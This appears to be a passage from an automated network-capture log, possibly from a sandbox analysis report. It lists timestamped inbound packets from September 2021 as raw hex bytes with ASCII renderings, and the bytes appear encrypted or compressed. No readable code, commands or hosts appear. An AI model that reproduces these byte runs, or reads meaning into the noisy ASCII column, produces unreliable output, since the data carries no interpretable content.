                                                                        2021-09-14 16:41:17 UTC34INData Raw: fa 2c f7 b3 64 4a 5c 49 7e 40 38 a6 dd f0 26 b8 4b 23 2d f0 38 f9 0f cb ee 76 03 26 41 9c 6e 14 bd 0d 6a e5 2c 1b ed 39 1b f8 51 24 a5 52 35 36 65 af 06 1f 88 e6 6d 1b 45 c3 df cd b6 fc 5d b9 0f ce ed 26 b3 69 f4 c0 d2 9b 76 05 b9 8d aa 7e 14 df 9a d9 5c 56 30 0a 66 29 c7 b3 2d 6c 9a 08 de 64 5a 2f 47 1d 3f 85 cf 95 b6 66 8d d8 a2 52 7a 4e a1 22 f4 86 75 19 34 9a 36 a6 83 3f f9 1d 91 7f 0d 6b 5b 5f 8e 50 6f 8f fb 03 56 68 86 93 d2 7b 2a 9b 4f 8b 21 b4 32 6e db 87 65 2a c2 a6 d6 90 31 db 2d 0a d7 71 18 31 1c 12 13 13 46 f5 bf 16 ce 03 46 65 09 b2 f3 d4 65 6d 95 a2 c9 f9 09 25 53 a5 ca 53 aa 39 56 65 9e c5 45 03 b9 b8 97 3c 36 2b ad 34 b2 3a 6e ac e7 0a 18 d6 91 68 5d d7 4c c6 8f e9 67 17 34 9e 3c 94 59 4e 86 3b 8b e3 83 15 c2 37 5a c5 58 49 7b e2 7c a6 6e
                                                                        Data Ascii: ,dJ\I~@8&K#-8v&Anj,9Q$R56emE]&iv~\V0f)-ldZ/G?fRzN"u46?k[_PoVh{*O!2ne*1-q1FFeem%SS9VeE<6+4:nh]Lg4<YN;7ZXI{|n
                                                                        2021-09-14 16:41:17 UTC35INData Raw: 13 a4 fa 85 b8 21 b1 4b 7c bd 68 fa 2c 2d f5 93 ae 19 81 b1 13 33 67 4e 27 51 6c 27 0b f0 80 16 9f 3a 17 f0 24 56 fc 23 06 3d 0f 80 c3 02 46 68 f2 eb 65 4d 42 61 36 51 8e f3 73 e4 3e 7a 58 f5 bb 60 21 3b 83 19 08 9c 56 b7 e5 75 52 d1 ee aa 1a 62 33 83 8b c8 e5 d7 94 c7 08 20 1f d3 c7 20 2c cc aa 0f ad c2 c7 23 b3 e6 fe 6d cc 61 de da 59 92 ca 5b ca 96 56 c7 32 57 e8 31 21 63 b4 b7 0a a8 98 6a 32 24 ac 6b c3 24 ee db 27 4c 77 27 85 5c 3f 75 1a d0 50 62 2b 08 df 89 aa 80 4e 9b 20 4b d6 bf 5a 08 26 9b 6a 8c 21 8f fc c0 d8 41 29 b2 a8 2d bd 96 78 92 fc ac 7d 87 f9 30 71 83 16 ce c5 b5 c7 8b 29 5b 41 92 9a 4f f7 a1 61 d4 5b 3f ee 5c 9f 7b b7 e0 86 53 5b 17 c5 3b ba 2d c1 7c 19 41 8f 48 8c 93 60 6c ac a6 07 2b aa fb fa 69 74 1b ca 6b 28 2b 47 ce c3 34 de 92 a0
                                                                        Data Ascii: !K|h,-3gN'Ql':$V#=FheMBa6Qs>zX`!;VuRb3 ,#maY[V2W1!cj2$k$'Lw'\?uPb+N KZ&j!A)-x}0q)[AOa[?\{S[;-|AH`l+itk(+G4
                                                                        2021-09-14 16:41:17 UTC36INData Raw: c5 65 c6 db a6 6b 01 42 80 c5 fd 3a de 36 ad 5d 5f 2b cc 44 10 13 d1 f7 58 c8 33 86 2f dd 21 5d f1 39 d3 a0 b3 80 65 2a 8c 57 72 05 d2 24 90 ef 34 ec 84 d9 93 44 7d 51 f9 8f c9 7e fb 0e 8a 5a 25 48 53 38 d3 05 de ed 7f 12 2e 2e ce 6e 4c ef 1e 6d ee 25 74 b8 93 19 89 17 2b b4 59 38 11 64 af 06 24 f5 f6 60 7e 3e d2 dd bc f0 f2 83 8f 02 93 db 26 b9 4b 70 d0 c3 94 7c 0d 80 fe c4 86 1e f5 f6 d2 53 77 a3 32 66 23 4d 0d 38 78 8d 1f 18 92 ee 0a 6f 20 bf e4 c5 86 a3 64 ab da 8a 4b 94 4d 8b 95 f4 86 34 2c 34 9a 25 b0 8f 07 c0 1d 91 7f 69 63 43 a1 7b 7c 63 a7 91 02 56 62 06 f1 d2 7b 2e 82 43 8b ad ae cc 6f d1 80 4d 9a 68 a7 d0 8c 20 db 25 17 33 70 34 21 60 71 13 13 c6 dc 90 16 8d 09 7f 12 ce b3 f3 ca 6d 6d 9d b5 37 f8 25 27 4b a9 ca 5b b4 c7 57 49 5d ba 26 03 74 bd
                                                                        Data Ascii: ekB:6]_+DX3/!]9e*Wr$4D}Q~Z%HS8..nLm%t+Y8d$`~>&Kp|Sw2f#M8xo dKM4,4%icC{|cVb{.CoMh %3p4!`qmm7%'K[WI]&t
                                                                        2021-09-14 16:41:17 UTC38INData Raw: 43 ae 96 e2 a2 90 05 a2 fa a4 86 1b 08 5e 2a 73 78 28 6a 6a 9d d5 b9 9b 40 b8 b1 91 13 2e b4 f4 47 85 13 05 a4 2f 7b 71 0e ed 6d 30 d5 c3 18 3f a8 2f ec c5 21 b1 40 b0 b5 6f 97 3e 2a f5 bd ae 19 8a ad 13 33 65 55 5c 55 76 4e 09 fe 80 42 9f 3a 04 d8 6f 55 9b 50 0c 44 39 81 c3 08 56 5f de ad e7 4d 44 49 c2 53 8e e4 4f cc 4d 1b 53 dd f6 6f 52 5f aa 3d 02 91 55 d0 db 1b ca db e9 88 3d 43 32 85 a9 62 e1 a4 b4 ee 2b 2a 0c dc fe 6c 3e ca c3 00 88 c2 cd 38 d9 c4 90 44 c7 66 fc 81 5f 8a a3 59 72 94 5c c2 32 12 e9 31 21 58 fb a5 0f c1 9b 4f 32 2e b5 03 e8 22 ff d5 36 75 3f aa 32 35 3b cd 18 da 5d 94 12 19 da ec e6 cc 4d 91 2f 0c 97 be 5a 08 95 7f 61 85 07 8e dd e1 8c 41 2f 90 cd 27 ba ff 42 b0 fc a6 5d af b6 33 70 99 3e ea c7 b5 88 e4 09 05 41 96 9d 67 a7 a2 63 d2
                                                                        Data Ascii: C^*sx(jj@.G/{qm0?/!@o>*3eU\UvNB:oUPD9V_MDISOMSoR_=U=C2b+*l>8Df_Yr\21!XO2."6u?25;]M/ZaA/'B]3p>Agc
                                                                        2021-09-14 16:41:17 UTC39INData Raw: 5a a5 3e 87 91 24 3e 17 e3 64 a6 6f 43 6e 4e 2f fa e3 23 66 3d 50 18 62 a5 25 b4 23 1f 32 79 37 c5 9e 25 5d 63 86 35 c6 10 a1 36 ae 99 51 19 d6 6a ee da a2 76 f5 55 84 55 eb 37 c6 0d b8 5c 4e 24 ae 1d ee 12 f9 fd 2a 8a e5 8b 34 ae 40 59 f1 22 fe c6 b9 7e 6e 2a 9b 8f 63 2b db f1 9a ef 03 c2 b5 75 47 25 94 79 ce 85 d6 78 e3 23 b2 4b 20 5a 73 39 d5 0c ac 41 7f 12 24 24 d7 7d 11 b7 0f 66 eb 2c 8a b8 15 12 e3 46 22 2e 51 59 69 76 aa 0c 1d 80 e9 9e 75 3f ca e7 d0 5a 0d 7c 94 23 f5 df 26 a2 66 f1 2e c2 be 59 18 bb 81 c5 97 11 c0 80 33 4e 73 1a 19 63 11 7f 93 c7 87 8f 6f d1 ba 55 00 45 34 3d ad de b6 a3 4e 5d d9 a2 58 fc 4e 8b 33 f6 ae 8d 7d 34 9c 3f d5 39 3f 69 17 9b 78 06 b8 5b 5f 70 43 61 99 fe 0e 6e d6 87 93 d2 6a 24 8a 42 11 a8 bc 1a 5f fd 87 6f 07 6d 9f 73
                                                                        Data Ascii: Z>$>doCnN/#f=Pb%#2y7%]c56QjvUU7\N$*4@Y"~n*c+uG%yx#K Zs9A$$}f,F".QYivu?Z|#&f.Y3NscoUE4=N]XN3}4?9?ix[_pCanj$B_oms
                                                                        2021-09-14 16:41:17 UTC40INData Raw: 08 d7 46 40 9c 24 ae 95 e8 74 30 dc 3c b4 08 8d b5 3c c9 36 b1 47 17 c8 72 21 31 f8 20 f8 c6 c8 83 28 01 47 cc 10 43 e9 45 9b 5f a2 e9 59 d3 2d 36 90 e9 af 9a 6d e9 68 a5 82 39 49 4e 2b 75 5a 0c b6 64 b3 8d 7e 9a 4a aa bc c2 25 2f b4 fa ed c8 15 2f a5 25 a5 7a 19 c1 6b 37 ba 9a 18 20 8f f3 e4 f5 21 b1 40 b3 85 6c 95 64 2d f5 99 df 19 80 bc 05 20 60 76 27 50 76 42 0b ef 85 0d 61 3b 39 fe 28 7e b4 56 06 3d 36 04 c3 02 5d 44 e5 ee e4 5c 47 76 85 50 a2 e1 7f fc 48 1b 48 f0 af 92 53 75 8b 21 99 91 5f bf fe 13 d9 d4 ee b1 70 58 cc 82 ad d2 90 18 b2 c6 02 20 15 c5 d3 25 2c cf da 21 52 c3 e1 3b a7 fa 98 de c1 7e de d8 59 8a b4 74 d4 9c a2 c5 36 25 e1 19 4a 73 b0 a0 60 5a b3 6b 38 17 cd 6c d2 23 e0 d4 22 58 73 b8 37 29 ed 75 36 ce 5d be 19 72 d9 e6 c8 a9 6a 91 29
                                                                        Data Ascii: F@$t0<<6Gr!1 (GCE_Y-6mh9IN+uZd~J%//%zk7 !@ld- `v'PvBa;9(~V=6]D\GvPHHSu!_pX %,!R;~Yt6%Js`Zk8l#"Xs7)u6]rj)
                                                                        2021-09-14 16:41:17 UTC42INData Raw: d6 83 98 ce be d5 51 0f a5 f5 5e 02 18 93 43 64 ab d2 79 49 8b 04 ac 5b d1 be 96 b0 23 c8 54 8d 22 1d 36 eb 9c 67 75 b9 76 30 b2 60 79 2b d2 56 bc 29 ae a8 59 22 1d 1b 4d 1d 7f 4b 4c 3e 05 d2 9c 4f fb 3b 3f 8a 4f 8b 30 ae 3a 08 1b 40 48 d9 91 dd 74 d8 8c 23 41 14 88 1e d4 b0 4e 0f aa f7 ef cb ad 7a 01 46 81 78 81 39 d8 18 95 cb 5e 21 bb 00 39 3b a8 f6 23 9b 5c 1e 2a a3 59 4d fb 21 d2 f1 cc 83 6f 00 a6 1e 6a 03 cf e3 b3 c1 54 e5 b5 73 22 d2 59 79 c4 9e c3 66 d9 0e 32 59 25 44 a5 af f8 05 d5 ec 56 06 41 b6 cf 6e 1e a1 0f 6b e3 ff 67 93 2a 10 ca 34 28 b4 5d 4e b3 2f af 0c 0d ad e3 60 74 19 eb ab c6 a5 f8 ab 9a 2a e6 d0 35 bd 71 ea c1 cd fd 4f 0f a8 8e ed 11 15 df 9a df 4d 77 81 33 66 23 1d 27 38 78 88 28 16 ba 55 00 47 2a 3e 85 cf ec 71 66 b6 d9 a2 52 a8 30
                                                                        Data Ascii: Q^CdyI[#T"6guv0`y+V)Y"MKL>O;?O0:@Ht#ANzFx9^!9;#\*YM!ojTs"Yyf2Y%DVAnkg*4(]N/`t*5qOMw3f#'8x(UG*>qfR0
                                                                        2021-09-14 16:41:17 UTC43INData Raw: 2e 91 f7 a6 12 4b f8 c2 96 e3 5a 49 2b 25 e4 9b 48 3d de d8 82 84 b8 b7 3e aa 7e ea 90 e0 fd e2 8a 98 3f 45 73 73 fd 62 0d 68 64 88 28 2d 7b 54 ff 44 98 9c 33 db 35 e9 75 21 e1 22 a7 3f 8d a4 36 f6 3b 4f 57 39 ed 43 1d 5c 31 20 e7 c2 cd ba 2a 04 67 fb 9a bd e8 63 ba 20 8f eb 53 d1 5d b0 83 e3 a5 9f 71 de f0 5a 83 1f 2f 64 30 77 50 06 77 61 88 b0 7e 8b 4a a5 48 eb 31 3b bb f0 1b 51 12 05 af 3a b5 11 df e9 68 36 ba 9e 12 23 b1 f9 ea fe 2b ae 4f 5e b4 43 84 38 04 50 98 84 13 0c 10 13 33 64 5d 69 4e 79 51 01 fe 91 1c 80 35 eb f1 06 5f a3 84 07 37 0f 9f d3 11 57 58 e7 e1 fb 54 bc 60 57 58 b6 22 66 ef 4d 04 43 e6 bb 6c 43 53 9d 10 fc 90 73 b2 f0 1c e2 77 ef a0 7f 53 37 9c 8b c8 e9 a4 a3 cc 12 d4 0d fa c0 2c 35 e2 d4 28 ac c8 a2 93 b7 fe 9b 6c dc 61 d4 c1 4f 8e
                                                                        Data Ascii: .KZI+%H=>~?Essbhd(-{TD35u!"?6;OW9C\1 *gc S]qZ/d0wPwa~JH1;Q:h6#+O^C8P3d]iNyQ5_7WXT`WX"fMClCSswS7,5(laO
                                                                        2021-09-14 16:41:17 UTC44INData Raw: 96 dd a6 e1 ca df 83 54 10 ba 82 ce b0 81 d6 51 11 76 b0 b7 b8 bd 5b ef 2d 6f 2a 75 42 9c 36 a5 bd 32 bc 37 73 4a 9d bd 45 6e 9f 21 32 33 37 a2 86 f7 42 97 42 56 1c a4 f5 71 3e 93 91 52 64 ba d9 78 49 8b 03 8e 67 f8 96 ea a5 dd cf 1c 36 06 0c 39 d6 94 67 45 bb 76 3c cc ff 69 22 f0 23 b5 3b 81 ef ab 20 1d 1b 0a 12 7e 4b 4c 3e 29 d2 52 4c fb 3b 43 14 5f 81 12 30 31 1a 38 45 71 cb 9a f3 d3 4e 8d 29 66 3f b0 30 83 85 3d 2b c7 6f e8 d8 ab 7a 07 45 a2 3f d5 38 d8 18 ac 50 4e 2a de 35 12 13 d3 e4 2f 8c 35 e9 0d a1 53 5a e0 3f d3 49 b1 80 69 69 a4 8b 6b 05 c3 e3 96 86 33 e7 b5 7f 65 64 5a 79 c8 9c cf aa ff 03 9a 6d 25 42 87 2b f4 2d e7 fd 7f 18 f0 2e df 67 03 61 0d 6a e5 2c 65 a9 07 2b 0d bd d4 a5 53 51 b5 76 a1 1d 02 94 f8 ee c3 2c 6b 21 38 5a f4 a9 8b 2a e6 db
                                                                        Data Ascii: TQv[-o*uB627sJEn!237BBVq>RdxIg69gEv<i"#; ~KL>)RL;C_018EqN)f?0=+ozE?8PN*5/5SZ?Iiik3edZym%B+-.gaj,e+SQv,k!8Z*
                                                                        2021-09-14 16:41:17 UTC45INData Raw: 02 10 b6 17 a4 5b 44 65 3b 9a ef df c3 d1 2a 5d c5 62 70 45 16 9a a7 90 b8 96 90 9e f9 75 83 cb 1d dc 65 1e 1b 5d 13 bf a2 bb 7b 41 10 97 70 38 b9 e6 a6 12 df eb cc 20 f4 5b 59 2b 34 ef 84 53 ee de 33 7b 94 bf de 9a ab 7f f3 b3 e1 e2 60 99 92 3f 61 79 6a 12 75 32 78 54 68 5b 2c 7b 5e c6 c7 86 62 34 98 92 e0 7c 1a fa 26 a7 31 8d a4 38 fe c8 b0 7a 16 fc 68 27 5e 20 24 e3 32 df 9c 3b 13 65 e6 8f d2 ea 47 b0 96 14 b4 c2 b0 de b2 83 ed a5 9f 7f dd 04 a5 ae 34 2e 4b fc 79 4d 15 6c 6a 8a be 66 64 41 92 a6 e8 93 98 a3 2a 24 1e 9e 2e a5 25 a4 71 10 d2 6f 37 ab 90 02 c1 a3 df ef c4 85 aa 52 a4 b5 7e 91 27 d2 f4 b5 8f 0f 82 23 a4 24 bf 43 60 4b 65 46 0b ef 84 00 61 3b 39 f3 3d 45 9f 56 17 33 11 7e c2 2e 5f 73 f3 d3 88 b2 bd 9e 7d 7b 8e e2 7c df 48 1b 7e f7 b1 6c 34
                                                                        Data Ascii: [De;*]bpEue]{Ap8 [Y+4S3{`?ayju2xTh[,{^b4|&18zh'^ $2;eG4.KyMljfdA*$.%qo7R~'#$C`KeFa;9=EV3~._s}{|H~l4
                                                                        2021-09-14 16:41:17 UTC47INData Raw: 99 15 62 ac 96 05 4a ac fb f4 77 5e 79 c9 72 63 62 47 92 c7 37 f6 a4 a1 52 b6 85 62 1d 1d f4 f6 05 bc cd 31 44 17 35 d1 fa 7d 13 49 57 b2 97 90 f5 b4 f0 cc cf fd 95 7f 32 89 10 b8 b3 24 75 01 65 b3 83 57 85 5b ef 36 b6 3b 7a 14 d1 34 a5 bf 75 21 34 73 4a a6 ed 57 69 88 00 03 52 34 a4 ef 5e c8 96 48 8e 01 8a cc 40 2a 6d 9a 4e 4a fc 4a 78 43 5f 15 a0 63 f9 8a e0 b3 23 ce 7a 1a 3f 3f 3c f4 af 4f 02 bb 76 36 ed f8 64 67 d8 49 ac 3b 87 81 3a 11 1e 1d 39 8a 7e 4b 18 2f 2c eb 96 f6 fb 3d 5a 18 48 f5 0a be 30 1e 1a 7f 30 da 97 f3 00 4c 8d 25 63 1d a3 36 a9 dc 88 09 c5 65 30 c5 82 43 3c 54 a8 5a f1 12 e0 1e bd 56 81 21 b7 6f 20 12 d5 f1 0b 8a 31 86 2d 8b 0f 5f f1 35 d3 c0 b0 80 69 69 48 89 6b 09 1b fc bf c1 1c e6 b5 7f 40 62 60 79 ce 85 17 74 f6 0c b3 46 25 42 8d
                                                                        Data Ascii: bJw^yrcbG7Rb1D5}IW2$ueW[6;z4u!4sJWiR4^H@*mNJJxC_c#z??<Ov6dgI;:9~K/,=ZH00L%c6e0C<TZV!o 1-_5iiHk@b`ytF%B
                                                                        2021-09-14 16:41:17 UTC48INData Raw: 66 d4 61 67 fa 17 c8 f9 03 4a d4 a4 ca 59 bd 56 de 64 53 ce 2a 8a 75 b9 9d 2f 3c 03 02 37 a8 3c 1d 29 dc 08 3a c9 80 6d 7f 4e 4f a9 fa c1 d7 12 1e 98 07 3f 5b 4e b1 13 17 e3 c8 1f ea b3 4c c9 79 0c ce eb 64 52 00 2e 86 87 42 fd 0b 1a db 0c c4 84 20 25 3b e7 53 59 b5 40 44 38 0c 71 24 b3 ce 0d 11 41 ed ef 12 f4 49 49 03 a8 ee 84 59 c8 d8 dc be 95 b0 ce a3 7d 7e e0 83 e0 91 73 98 92 39 47 77 b4 17 46 09 4b 6c e7 51 3f 74 58 da eb a3 9c 35 be 48 52 75 2b ec 29 ba 1d 21 b6 3c ef 59 36 57 15 e2 56 21 58 1b 36 e9 c2 b1 38 2b 15 6b f3 5d 50 fe 5c a3 20 2f e9 53 d1 53 a0 81 f9 b2 e1 f2 c0 fa a2 91 22 37 52 3b 65 4a 69 e1 6b 9b bc 6d 89 51 b0 a7 fa 04 40 3d f1 33 ce 00 17 b4 34 8d f4 08 c1 61 1a f2 85 0b 17 2d f2 ea e5 0c 8e 50 b2 9d e0 94 3e 26 d8 af f7 3b 82 ad
                                                                        Data Ascii: fagJYVdS*u/<7<):mNO?[NLydR.B %;SY@D8q$AIIY}~s9GwFKlQ?tX5HRu+)!<Y6WV!X68+k]P\ /SS"7R;eJikmQ@=34a-P>&;
                                                                        2021-09-14 16:41:17 UTC49INData Raw: ea 3a 46 81 e4 26 ec 8e 10 d0 d1 29 93 8d 2c 0d 57 00 8b 49 e8 ab 75 48 44 39 90 38 89 ed a6 e6 99 5f 2f 89 d6 46 ef 20 d7 e4 0b 6f f7 47 9a 05 05 64 b3 a9 13 ca f1 fd f1 1e 73 78 c8 63 5e 68 50 a1 ed 36 f6 f0 a8 45 c8 df d9 1d 17 f7 ff 04 ad 25 31 44 19 11 ee 6f 7d 15 6b 05 a5 bf 28 de ac f4 d5 44 95 53 7f 33 90 c9 a7 91 1a 40 a3 74 be 98 69 31 64 ef 3c 69 99 6d 6d e6 37 2b 0c d1 09 36 73 4d 2c a6 53 7a 86 39 12 44 20 bb 0d b7 c8 96 43 43 06 be ed 61 3d f1 81 4a 75 d2 d6 69 40 99 03 3a 58 f1 be 43 b3 23 c4 6d 13 35 8d 10 db a4 47 14 20 5e 27 dd f8 72 fb ca 47 b6 20 af 94 21 21 17 35 51 8b 7e 41 32 3d 2c fa fe b2 f0 3d 50 66 5c 8b 3a a4 5f 08 33 68 38 c9 95 ca 58 5b a5 9c 48 05 a7 21 22 b4 4e 09 c4 7c e6 da af 7d 14 44 24 6f fd 3a d9 bc ac 54 4b 35 a5 39
                                                                        Data Ascii: :F&),WIuHD98_/F oGdsxc^hP6E%1Do}k(DS3@ti1d<imm7+6sM,Sz9D CCa=Jui@:XC#m5G ^'rG !!5Q~A2=,=Pf\:_3h8X[H!"N|}D$o:TK59
                                                                        2021-09-14 16:41:17 UTC50INData Raw: f0 2c 7e 51 57 06 3d 27 4b c2 02 57 37 3a ea e4 47 51 67 72 79 12 e2 67 e5 65 0d 5b f5 b7 7f 55 48 85 34 05 97 54 62 88 18 ca d1 f8 b1 73 57 e8 90 93 c8 e8 9c 8b c4 08 2a 1d de fe e6 3e ca c3 00 6e c1 cd 34 a7 f5 b9 b9 cd 61 d2 dc d1 d5 a5 71 ca 85 4f d5 09 27 f6 3c b6 61 a3 c9 46 c6 b3 61 21 22 ae 60 c4 b9 f3 ce 3d 4a e9 ba 37 40 e5 75 1a dc 48 b5 20 10 cb ea d4 1b 66 f7 28 24 b9 d1 ad 03 fa 43 73 88 1c 84 e1 87 4b 42 29 be 63 a8 bd f9 6a 92 ef b2 46 93 ef 26 fc a0 16 ce c6 17 93 9f 27 10 55 b4 39 4f f7 ab 77 fc 91 3c 8f 35 88 fc b0 e0 86 52 2a 00 d6 55 e6 3a 4d 47 1a 69 e9 eb 9d 8c 00 76 b8 8e a6 56 e0 f1 ee 45 9a 7a c8 6f 44 ec 40 ce c7 36 e5 ec b0 44 b1 e1 54 22 1d fe fd a1 d3 f4 24 50 07 35 65 f8 7d 1f 75 25 74 94 96 db ba 7f cb c9 92 52 6b 26 97 e6
                                                                        Data Ascii: ,~QW='KW7:GQgryge[UH4TbsW*>n4aqO'<aFa!"`=J7@uH f($CsKB)cjF&'U9Ow<5R*U:MGivVEzoD@6DT"$P5e}u%tRk&
                                                                        2021-09-14 16:41:17 UTC51INData Raw: dc b2 91 6a 1f 70 88 47 06 d3 f8 80 fa 2e e6 a4 70 52 40 a6 78 e2 87 c0 6e 26 2b ad 51 36 47 8d 29 fc 12 21 fc 53 11 36 3d cb 6e 05 b2 02 9d f5 09 78 bf 3b 74 3b 42 2b be 6f 0b 7e 76 aa 0c 1d 80 ea 9e 75 3f c6 c9 cd bb e1 86 8b 3b e3 c1 d8 b2 4f e2 fb 60 8e 49 0a a8 95 c0 99 1d 21 91 e1 47 59 0f e4 6c 36 c7 7e 3d 78 98 05 18 44 54 26 60 3c 3d ea 0c 86 a7 44 a2 02 b1 5c a9 55 98 27 f4 97 31 63 ca 9b 18 94 8b 3d 60 07 fe 90 69 6b 51 40 6a 78 40 8e ed 09 55 6e 91 fc 3d 7b 2a 91 67 5e a4 b5 38 0f d5 54 64 2a 62 8f 02 91 2c d1 05 2e cd 71 12 3c 01 1b 00 16 c2 e5 ba 00 73 02 6a 66 d9 a0 f6 d4 70 68 8a ae 37 f8 25 27 78 a0 f2 5a 55 c6 a9 6d 79 c4 45 03 67 89 93 3c dd 2a ad 34 c7 3a 6e bc cb 1b 3a f9 41 69 57 d5 4f b8 fa f6 76 ef 1f b2 39 a2 4a 4a 93 ef 88 e3 ce
                                                                        Data Ascii: jpG.pR@xn&+Q6G)!S6=nx;t;B+o~vu?;O`I!GYl6~=xDT&`<=D\U'1c=`ikQ@jx@Un={*g^8Td*b,.q<sjfph7%'xZUmyEg<*4:n:AiWOv9JJ
                                                                        2021-09-14 16:41:17 UTC52INData Raw: 05 af 51 b7 7b 09 da 78 3f a8 9c 09 37 2c 44 fd 35 09 b7 41 a0 9e 7e 92 2f 24 dd 79 84 19 86 be 1a 40 47 4c 6c 57 65 48 1a f4 91 13 b7 e4 15 f0 2c 39 b3 54 06 31 1e 8a d2 09 32 7c f4 eb e2 5c 48 70 72 3e a8 e0 67 e9 5c 11 71 2b b2 6c 54 36 a8 1b 02 97 81 b3 c9 2d ca d1 e4 88 4d 40 32 89 5f db f2 a9 a5 10 1b 27 1d db c7 2b b3 7d fa 1b 53 3d 32 ec a3 db b9 73 cd 61 de d8 50 f9 1f 71 cb 9c 57 ec 22 31 e9 3b f5 72 b6 8c 08 ed f2 27 32 2e bf 6c d2 23 f9 df 31 5d 68 a9 32 33 32 74 1a da 4f bc 31 19 c0 e6 ce 80 4e 91 29 24 ec be 5a 02 53 45 60 85 05 88 f5 af 83 41 29 b8 6e 25 ba f8 6a 93 fc a6 51 87 f9 30 51 9e 16 ce e0 b4 82 8b 26 04 41 9c 80 4f f7 a0 70 e4 56 3f af 32 9f 71 c5 e0 86 42 2f 06 c0 78 0c 2d c1 78 1a 78 ef 51 72 98 38 7a 84 79 06 56 e6 d3 32 6d 5e
                                                                        Data Ascii: Q{x?7,D5A~/$y@GLlWeH,9T12|\Hpr>g\q+lT6-M@2_'+}S=2saPqW"1;r'2.l#1]h232tO1N)$ZSE`A)n%jQ0Q&AOpV?2qB/x-xxQr8zyV2m^
                                                                        2021-09-14 16:41:17 UTC54INData Raw: 5c 4f 8f 23 4b 05 f7 36 af b3 04 08 c5 6f 4e ca a7 6b 1d 54 a8 50 fd 3a d8 1e bd 5c 5f 21 b7 11 10 13 16 f4 23 9d fa 87 2b a3 46 5c f1 33 e1 d9 b2 81 74 36 8b 89 03 02 c5 f2 ef e9 2b f7 c6 cf 4d 4a 52 73 e6 60 ca 74 f6 2a cc 66 25 42 87 30 96 b5 de fd 75 1f 27 41 7f 6f 14 bd 0d 6f e2 36 7f 81 2c 1a f2 42 3a b8 4c 4d f9 76 ab 05 1d 81 98 d0 75 13 c9 cc c2 b4 f7 ae 8e f7 13 da 26 b3 72 e2 f8 33 91 5a 09 c7 36 c4 86 1e f7 0c cd 4f 55 0b 34 77 2f e5 e2 39 78 83 2c 07 67 81 0a 6f 2a 2e 80 ed 77 a4 4e b3 b7 10 59 a4 44 a3 be f4 86 3e 6e 3e 8b 3e b7 86 17 f1 1e 91 79 06 d9 5a 5f 70 78 f3 8f ed 09 47 6e ae e0 d3 7b 2c 88 48 9a a0 9d c0 6d fd 81 0a 98 69 a7 dc b8 b0 db 2d 00 de 79 09 36 36 f4 10 13 c4 e5 ba 3e 7e 00 46 63 e6 47 f0 d4 67 02 4a a3 c9 f3 21 16 52 a5
                                                                        Data Ascii: \O#K6oNkTP:\_!#+F\3t6+MJRs`t*f%B0u'Aoo6,B:LMvu&r3Z6OU4w/9x,go*.wNYD>n>>yZ_pxGn{,Hmi-y66>~FcGgJ!R
                                                                        2021-09-14 16:41:17 UTC55INData Raw: 6b 8b ad 41 e9 49 ac 3d b0 fb 53 c0 50 b1 80 17 a4 a2 70 d0 eb b5 92 a9 35 57 35 64 43 14 68 7b 89 a2 80 9b 6c a7 9e f7 1e 2f b2 d8 10 c8 13 0f 8d 25 a1 7b 0f e9 4f 37 ba 9e 0b 3b bb e0 f8 ef 30 a3 5e b1 4b 6e b9 23 3d fe 8e 09 46 80 ad 12 20 6a 5f 63 47 69 7f 96 ef 8f 79 d6 3b 15 fa 39 5c 84 44 15 25 0f 91 d1 1d 50 a6 f7 c7 ec 5c 4b 72 6a 4e 80 f1 75 ef 5c 09 43 0b b0 40 5b 27 11 19 02 9b 53 a4 f2 08 ca c0 fc bf 68 be 33 af 8b ca e9 b3 28 d5 0e 35 12 c5 c4 25 2c d8 da 0a 52 c3 e1 3f a7 f6 80 42 a2 45 d6 cb 5a 95 86 62 d9 96 4d d6 05 26 17 30 07 61 a1 aa 60 0e b3 6b 38 36 81 15 d2 23 ff c0 29 4e 61 a9 23 21 04 8a 1b f6 58 a4 22 0b da f7 dc 9e 52 6f 28 08 aa af 50 14 60 6d df 87 0d 8f e3 87 a1 41 29 b2 62 65 17 07 95 6c e3 bb 44 95 f9 21 62 80 33 30 c6 99
                                                                        Data Ascii: kAI=SPp5W5dCh{l/%{O7;0^Kn#=F j_cGiy;9\D%P\KrjNu\C@['Sh3(5%,R?BEZbM&0a`k86#)Na#!X"Ro(P`mA)belD!b30
                                                                        2021-09-14 16:41:17 UTC56INData Raw: f3 a2 99 11 b3 67 3f cc eb 46 88 25 b8 49 e5 92 a5 09 16 1d 1d 6f 99 6c 38 fc 2f 2c f0 e8 64 c3 3d 50 18 90 89 3c 95 39 30 32 29 2e da 91 db 5c 4f 8d 02 4b 05 a1 f3 ad b3 4e ef c7 6f ee de a7 6b 0b 4e a8 50 fc 21 e8 19 bd df 5d 21 b1 6b 10 13 c4 86 99 9d 33 8c 21 8b 08 5c f1 35 94 3d b3 80 65 15 8a f7 57 03 c5 f8 97 c1 05 e4 b5 73 41 34 64 79 ce 85 e1 7a f4 26 b4 35 95 43 8d 32 f4 0c b0 4c 7e 12 24 3d cb 67 7b 88 1e 63 fe 34 71 aa 2f 0d e1 57 13 a1 5f 46 63 74 b9 1d 19 1f e4 6f 5c 1c c7 df c1 b4 fd ab af 2a e6 d0 0e a3 67 e7 d6 eb bc 58 0f ae ac 20 87 14 d5 b8 51 4f 5f 12 21 6a 38 c1 02 dc 79 89 0a 11 bd 44 06 00 e3 3f 85 cf ea 84 4e b5 d8 a2 58 a4 5e cb 79 dc 17 34 7d 3e 2d 23 70 0e 2a 69 1d 90 6c 64 40 1d 4e 6a 41 68 98 c5 e5 57 68 8c 89 08 54 06 8a 42
                                                                        Data Ascii: g?F%Iol8/,d=P<902).\OKNokNP!]!k3!\5=eWsA4dyz&5C2L~$=g{c4q/W_Fcto\*gX QO_!j8yD?NX^y4}>-#p*ild@NjAhWhTB
